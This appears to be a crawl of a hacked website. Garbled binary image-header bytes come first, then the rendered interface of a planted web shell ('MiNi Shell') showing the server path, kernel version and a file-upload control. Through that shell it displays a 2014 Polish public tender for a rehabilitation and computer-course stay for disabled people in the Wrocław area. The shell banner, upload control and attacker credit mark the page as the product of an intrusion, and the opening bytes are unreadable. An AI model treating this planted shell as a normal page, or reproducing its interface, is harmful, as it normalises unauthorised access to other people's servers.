JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140411/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140411/124776-N-2014.html

<p class="kh_header"><b>Wrocław: Usługa polegająca na zorganizowaniu turnusu rehabilitacyjno - szkoleniowego wraz z kursem obsługi komputera oraz treningami umiejętności i kompetencji społecznych</b><br>
<b>Numer ogłoszenia: 124776 - 2014; data zamieszczenia: 11.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Pomocy Rodzinie we Wrocławiu , ul. Kościuszki 131, 50-440 Wrocław, woj. dolnośląskie, tel. 71 72 21 860, faks 71 72 21 869.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na zorganizowaniu turnusu rehabilitacyjno - szkoleniowego wraz z kursem obsługi komputera oraz treningami umiejętności i kompetencji społecznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu turnusu rehabilitacyjno - szkoleniowego wraz z kursem obsługi komputera oraz treningami umiejętności i kompetencji społecznych dla 21 osób niepełnosprawnych oraz 9 opiekunów, zamieszkujących w  Powiecie Wrocławskim (łącznie 30 osób). Turnus będący przedmiotem zamówienia będzie trwał przez kolejne 22 dni kalendarzowe.
2. Miejsce realizacji przedmiotu zamówienia: ośrodek rehabilitacyjny położony nad morzem na terenie Polski, przystosowany do potrzeb osób niepełnosprawnych, w tym dla osób poruszających się na wózkach inwalidzkich i z dysfunkcją narządu wzroku.
3. W zakres przedmiotu zamówienia wchodzą: 
1) Zorganizowanie turnusu  rehabilitacyjnego zgodnie  z przepisami  ustawy  z  dnia  27 sierpnia  1997 r. o rehabilitacji zawodowej i społecznej  oraz  zatrudnianiu osób niepełnosprawnych (Dz. U. z  2011 r. Nr 127, poz.721 ze  zm.) oraz  rozporządzenia Ministra  Pracy  i  Polityki  Społecznej   z  dnia 15 listopada 2007 r. w  sprawie  turnusów  rehabilitacyjnych  (Dz. U. z 2007 r., Nr 230, poz. 1694), w oparciu o program turnusu rehabilitacyjnego szkoleniowego z kursem obsługi komputera wraz z treningami umiejętności i kompetencji społecznych stanowiącego załącznik nr 9 do niniejszej SIWZ.
2) Przewóz uczestników organizowanego turnusu bez udziału osób trzecich do ośrodka rehabilitacyjnego i z powrotem, w tym dla dwóch osób poruszających się na wózkach.
3) Zakwaterowanie uczestników turnusu wyłącznie w pokojach 1 i 2 osobowych z łazienką, wyposażone w jednoosobowe łóżka z pościelą, szafy ubraniowe, stoliki i krzesła (wyklucza się łóżka piętrowe), TV i  telefon (zamiennie Zamawiający dopuszcza przycisk alarmowy).
4) Przeprowadzenie w ramach aktywnej integracji osób niepełnosprawnych: 
a) kursu obsługi komputera  (30 godzin) przy założeniu, że zajęcia praktyczne kursu obsługi komputera stanowić będą powyżej 90%  z ogólnej liczby godzin kursu, 
b) treningów kompetencji i umiejętności społecznych (27 godzin).
4. Wymagania stawiane Wykonawcy:
1) Dotyczące realizacji przedmiotu zamówienia. Wykonawca zapewni:
a) opiekę pilota lub kierownika turnusu podczas podróży,
b) ubezpieczenie NW dla uczestników turnusu,
c) postoje w czasie podróży dostosowane do potrzeb osób niepełnosprawnych,
d) wyżywienie trzy razy dziennie z dodatkowym posiłkiem - podwieczorkiem 
oraz zapewnienie prowiantu w czasie podróży w dniu powrotu,
e) zakwaterowanie, wyżywienie i przeprowadzanie szkoleń na terenie tego samego ośrodka (stołówka i sala szkoleniowa na miejscu),
f) skorzystanie przez każdego niepełnosprawnego uczestnika turnusu (21 osób) 
z min. 20 zabiegów w trakcie trwania turnusu, zgodnie z zaleceniem lekarskim,
g) zorganizowanie i przeprowadzenie imprez o charakterze integracyjnym 
i aktywizacyjnym dla uczestników turnusu, typu: wieczorek zapoznawczy - min. 1 raz, ognisko - min. 1 raz, oraz wycieczkę krajoznawczą - 1 raz oraz zajęć rekreacyjno-sportowych na terenie ośrodka.
2) Dotyczące ośrodka. Wykonawca zapewni:
a) boisko oraz wypożyczalnię sprzętu rekreacyjno-sportowego bez dodatkowych opłat dla uczestników turnusu,
b) sale wykładowe, w których będą odbywały się zajęcia dostosowane do potrzeb osób niepełnosprawnych, w tym poruszających się na wózkach inwalidzkich 
i z dysfunkcją narządu wzroku, zgodnie z obowiązującymi przepisami BHP,
c) przestrzeganie przez uczestników podstawowych zasad współżycia społecznego (np. poprzez zakaz nadużywania alkoholu na terenie ośrodka),
d) odpowiednią bazę do prowadzenia rehabilitacji, w tym min. 1 gabinet lekarski 
i  zabiegowy.
3) Dotyczące przeprowadzenia kursu i treningów. Wykonawca winien:
a) przygotować programy kursu, treningów i poradnictwa odzwierciedlające zakres realizowanego materiału zgodnie z programem turnusu rehabilitacyjnego szkoleniowego z kursem obsługi komputera wraz z treningami umiejętności 
i kompetencji społecznych stanowiącego załącznik nr 9 do niniejszej SIWZ oraz udokumentować prowadzenie zajęć w formie konspektów, dzienników  i listy obecności  uczestników turnusu,
b) zapewnić minimum 2 wykładowców/trenerów posiadających kwalifikacje do prowadzenia ww. zajęć (informatyk, doradca zawodowy, psycholog lub terapeuta).
c) zapewnić sprzęt komputerowy wraz z oprogramowaniem i sprzęt biurowy, który będzie wykorzystywany podczas zajęć praktycznych, nie starszy niż 5 lat,
d) zapewnić materiały dydaktyczne (pendrive, podręcznik, długopis 
i notatnik) oraz zaświadczenie o ukończeniu kursu i treningów, które będą wyposażone w logo EFS zgodnie z zasadami promocji POKL oraz posiadać zaświadczenia o statusie Centrum Egzaminacyjnego ECCC, ECDL lub równoważne, 
e) prowadzić dokumentację fotograficzną z prowadzonych zajęć oraz zachować dodatkowy komplet materiałów dydaktycznych dla Zamawiającego,
f) udostępnić wszelkie dokumenty, w tym finansowe, związane z realizacją turnusu 
na każde żądanie Zamawiającego oraz inne uprawnione podmioty dokonujące kontroli w zakresie prawidłowości przebiegu projektu systemowego - Postaw na aktywność.
4) Wykonawca odpowiedzialny będzie za realizację przedmiotu zamówienia zgodnie 
z przepisami prawa oraz za przebieg i terminowe wykonanie zamówienia w okresie wykonywania umowy. 
5)Wymagana jest należyta staranność przy realizacji zamówienia.
6. Obowiązki Zamawiającego:
1) Zamawiający zobowiązuje się do przekazania wybranemu Wykonawcy w terminie 7 dni od dnia podpisania umowy, danych osób uczestniczących w turnusie celem ubezpieczenia oraz uzyskanej przez uczestników wysokości dofinasowania ze środków PFRON. 
2) Zamawiający zobowiązuje się do przekazania uczestnikom turnusu przed wyjazdem, wszelkich niezbędnych informacji dotyczących zasad obowiązujących podczas pobytu w ośrodku.
3) Ustalenia i decyzje dotyczące wyjazdu i powrotu uczestników turnusu, uzgadniane będą przez Zamawiającego z ustanowionym przedstawicielem Wykonawcy.
4) Zamawiający zobowiązuje się  w terminie 7 dni od dnia podpisania umowy, do przekazania Wykonawcy oznaczeń (logo) celem oznaczania wszystkich dokumentów, materiałów szkoleniowych (pendriva, podręcznika, notatnika oraz długopisu) i zaświadczeń/certyfikatów zgodnie z Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki z dnia 4 lutego 2009 r..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.50.00.00-9, 80.53.32.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 22.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest zabezpieczenie oferty poprzez wniesienie wadium w wysokości 1 000,00 zł (słownie: jeden tysiąc złotych 00/100) przed terminem składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż posiada aktualny wpis do rejestru organizatorów i ośrodków uprawnionych do przyjmowania zorganizowanych grup turnusowych, w których uczestniczą osoby niepełnosprawne, korzystające z dofinansowania ze środków Państwowego Funduszu Rehabilitacji Osób Niepełnosprawnych, w szczególności na turnus szkoleniowy z kursem komputerowym dla osób z dysfunkcją: narządu ruchu, 
z  dysfunkcją narządu ruchu poruszających się na wózkach inwalidzkich, z dysfunkcja narządu słuchu, z dysfunkcją narządu wzroku, z upośledzeniem umysłowym, z chorobą psychiczną, z epilepsją, ze schorzeniami układu krążenia, z innymi dysfunkcjami lub schorzeniami niż w/w wymienione.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum)  powyższy warunek może być spełniony wspólnie przez członków konsorcjum</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał co najmniej dwie usługi polegająca na zorganizowaniu i przeprowadzeniu turnusu rehabilitacyjno-szkoleniowego dla minimum 20 osób każdy. 
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum)  powyższy warunek może być spełniony wspólnie przez członków konsorcjum.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje osobami posiadającymi doświadczenie, wykształcenie i kwalifikacje  zawodowe odpowiednie do stanowisk, jakie zostaną im powierzone, tj. 
a) min. 1 osobą, która będzie prowadzić kurs obsługi komputera, posiadającą wykształcenie informatyczne, z co najmniej 2 letnią praktyką zawodową.
b) min. 1 osobą, która będzie prowadzić treningi umiejętności i kompetencji społecznych, posiadającą wykształcenie jako doradca zawodowy, psycholog lub terapeuta, z co najmniej 2 letnią praktyką zawodową. 
W przypadku Wykonawców zagranicznych, dopuszcza się równoważne kwalifikacje, zdobyte w innych państwach, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008 r. (Dz. U. z 2008 r. Nr 63 poz. 394 ze zm.) o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (Konsorcjum, spółka cywilna) powyższy warunek może być spełniony wspólnie przez członków konsorcjum - wspólników spółki cywilnej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 75</li>
<li>2 - Położenie ośrodka od centrum miejscowości - 5</li>
<li>3 - Położenie ośrodka od plaży - 5</li>
<li>4 - Basen kąpielowy na terenie ośrodka - 5</li>
<li>5 - Termin realizacji zamówienia - 10</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazane są istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba, że nastąpi jedna z poniższych okoliczności:
a) zmiany stawki podatku VAT na świadczone usługi,
b) jeżeli ich wprowadzenie wynika z okoliczności powodujących, iż zmiana leży w interesie publicznym,
c) zmiana terminu realizacji przedmiotu zamówienia jeżeli nie wynika ona z winy Wykonawcy,
d) zamiana osób realizujących przedmiot zamówienia jeżeli wynika ona z ważnych przyczyn losowych,
e) rezygnacja przez Zamawiającego z realizacji części przedmiotu zamówienia 
w przypadku utracenia przez Zamawiającego środków do realizacji zadania lub jego części. W takim przypadku wynagrodzenie przysługujące Wykonawcy zostanie pomniejszone o koszty dotyczące danej części zamówienia np. rezygnacji z części szkolenia;
f) w każdym przypadku, gdy zmiana jest korzystna dla Zamawiającego (np. gdy obniży to koszty usługi);
g) zmiany przepisów prawnych dot. świadczenia usług prowadzenia turnusów rehabilitacyjnych dla osób niepełnosprawnych.
2.Zmiany, o których wyżej mowa, powinny zostać wprowadzone na pisemny wniosek jednej ze stron, drogą uzgodnionego przez strony aneksu do umowy o zamówienie publiczne, sporządzonego w formie pisemnej pod rygorem nieważności</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pcpr.wroclaw.bip-e.pl/pcpr/przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Powiatowego Centrum Pomocy Rodzinie we Wrocławiu  przy  ul. Kościuszki 131, 50-440 Wrocław, w Sekretariacie pok. 431, IV piętro.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.04.2014 godzina 13:00, miejsce: w siedzibie Powiatowego Centrum Pomocy Rodzinie we Wrocławiu  przy  ul. Kościuszki 131, 50-440 Wrocław, w Sekretariacie pok. 431, IV piętro.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Zamówienie dotyczy realizacji projektu systemowego -Postaw na aktywność, współfinansowanego przez Unię Europejską ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki, Priorytet VII - Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnienie aktywnej integracji, Poddziałanie 7.1.2 Rozwój i upowszechnienie aktywnej integracji przez powiatowe centra pomocy rodzinie.
2.Zamówienie jest współfinansowane ze środków PFRON..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com